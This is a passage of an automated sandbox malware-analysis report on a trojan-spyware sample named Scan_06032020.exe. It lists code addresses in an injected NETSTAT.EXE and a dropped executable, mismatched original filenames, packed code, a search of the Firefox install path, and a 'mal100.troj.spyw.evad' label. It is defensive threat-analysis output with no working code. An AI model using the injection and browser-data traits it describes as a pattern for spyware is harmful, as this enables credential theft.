Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034C1746 6_2_034C1746 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034C1FCE 6_2_034C1FCE Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034B2782 6_2_034B2782 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_03415790 6_2_03415790 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_03417640 6_2_03417640 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_03424E61 6_2_03424E61 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034BCE66 6_2_034BCE66 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_03425E70 6_2_03425E70 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_03426611 6_2_03426611 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034C26F8 6_2_034C26F8 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034B3E96 6_2_034B3E96 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034B1D1B 6_2_034B1D1B Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034C2519 6_2_034C2519 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_03411530 6_2_03411530 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_0349C53F 6_2_0349C53F Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_033F0D40 6_2_033F0D40 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034AFDDB 6_2_034AFDDB Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034BD5D2 6_2_034BD5D2 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034A1DE3 6_2_034A1DE3 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_0349E58A 6_2_0349E58A Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034BE581 6_2_034BE581 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_0342547E 6_2_0342547E Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_0340740C 6_2_0340740C Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_03411410 6_2_03411410 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034AF42B 6_2_034AF42B Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034BDCC5 6_2_034BDCC5 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034B44EF 6_2_034B44EF Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034C1C9F 6_2_034C1C9F Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034C2C9A 6_2_034C2C9A Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034B3490 6_2_034B3490 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_02E7D9C8 6_2_02E7D9C8 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_02E7DEEC 6_2_02E7DEEC Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_02E62FB0 6_2_02E62FB0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_02E69F60 6_2_02E69F60 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_02E69F5B 6_2_02E69F5B Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_02E62D89 6_2_02E62D89 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_02E62D90 6_2_02E62D90 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0A05F798 16_2_0A05F798 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0A05F797 16_2_0A05F797 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B444151 16_2_0B444151 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B4430D8 16_2_0B4430D8 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B442650 16_2_0B442650 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B444490 16_2_0B444490 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B444207 16_2_0B444207 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B44310D 16_2_0B44310D Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B441020 16_2_0B441020 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B441030 16_2_0B441030 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B4430C9 16_2_0B4430C9 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 17_2_00401030 17_2_00401030 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 17_2_0041D9C8 17_2_0041D9C8 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 17_2_00402D89 17_2_00402D89 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 17_2_00402D90 17_2_00402D90 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 17_2_0041DEEC 17_2_0041DEEC Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 17_2_00409F5B 17_2_00409F5B Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 17_2_00409F60 17_2_00409F60 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 17_2_00402FB0 17_2_00402FB0
 Found potential string decryption / allocating functions Show sources
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 03485110 appears 38 times Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0344DDE8 appears 43 times Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 033FB0E0 appears 176 times
 Sample file is different than original file name gathered from version info Show sources
 Source: Scan_06032020.exe Binary or memory string: OriginalFilename vs Scan_06032020.exe Source: Scan_06032020.exe, 00000000.00000002.555559475.00000000006C2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe Source: Scan_06032020.exe, 00000000.00000002.565029549.000000000B130000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Scan_06032020.exe Source: Scan_06032020.exe, 00000000.00000000.528970707.0000000000652000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe Source: Scan_06032020.exe, 00000000.00000002.556283565.0000000000DD0000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Scan_06032020.exe Source: Scan_06032020.exe Binary or memory string: OriginalFilename vs Scan_06032020.exe Source: Scan_06032020.exe, 00000002.00000002.551467733.00000000003E2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe Source: Scan_06032020.exe, 00000002.00000002.551670785.0000000000452000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe Source: Scan_06032020.exe Binary or memory string: OriginalFilename vs Scan_06032020.exe Source: Scan_06032020.exe, 00000003.00000000.552652444.00000000001B2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe Source: Scan_06032020.exe, 00000003.00000000.552510795.0000000000142000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe Source: Scan_06032020.exe Binary or memory string: OriginalFilename vs Scan_06032020.exe Source: Scan_06032020.exe, 00000004.00000002.606369972.0000000001C9F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Scan_06032020.exe Source: Scan_06032020.exe, 00000004.00000000.554340459.0000000000EA2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe Source: Scan_06032020.exe, 00000004.00000002.603915424.0000000000FF0000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs Scan_06032020.exe Source: Scan_06032020.exe, 00000004.00000000.554197147.0000000000E32000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe Source: Scan_06032020.exe Binary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe Source: Scan_06032020.exe Binary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
 Searches the installation path of Mozilla Firefox Show sources
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory Jump to behavior
 Tries to load missing DLLs Show sources
 Yara signature match Show sources
 PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3) Show sources
 Source: Scan_06032020.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ Source: ufipp6ljxlz.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Classification label Show sources
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@16/8@9/4
 Creates files inside the user directory Show sources
 Creates mutexes Show sources
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4640:120:WilError_01
 Creates temporary files Show sources
 PE file has an executable .text section and no other executable section Show sources
 Source: Scan_06032020.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Parts of this applications are using the .NET runtime (Probably coded in C#) Show sources